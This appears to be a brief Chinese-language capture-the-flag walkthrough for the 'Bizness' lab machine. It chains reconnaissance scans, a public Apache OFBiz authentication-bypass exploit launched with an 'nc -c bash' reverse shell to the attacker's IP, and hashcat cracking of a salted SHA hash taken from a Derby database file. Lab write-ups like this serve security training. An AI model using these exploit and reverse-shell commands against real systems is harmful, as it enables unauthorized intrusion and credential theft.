Main
$ nmap -p- 10.10.11.252 --min-rate 1000

$ dirsearch -u https://bizness.htb/

$ whatweb https://bizness.htb/control/login

存在一个未授权的RCE

$ git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git 
 $ cd Apache-OFBiz-Authentication-Bypass/ 
 $ python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'

User Flag
$ cat /home/ofbiz/user.txt

4f868ad44d8eb00d2d7d094bd5279de0
Root Flag
$ cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

为了使用hashcat等密码破解工具破解这些哈希值,需要先将其进行base64解码,然后转换为十六进制字符串。这是因为hashcat等工具通常需要将哈希值以十六进制字符串的形式输入进行破解。

$ hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
- $SHA$: 这部分指示了使用的哈希算法。在这种情况下,$SHA$表示密码是使用SHA哈希算法进行加密的。
 d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I: 这部分是经过哈希处理的密码值。通常,密码哈希值是通过将密码与随机生成的字符串(称为盐值)一起输入到哈希函数中生成的。在这个字符串中,d$可能是盐值的一部分,而uP0_QaVBpDWFeo8-dRzDqRwXQ2I可能是密码的哈希值。

# cat /root/root.txt

8c72dd83a893d66bef258dc1c43eb2e4



















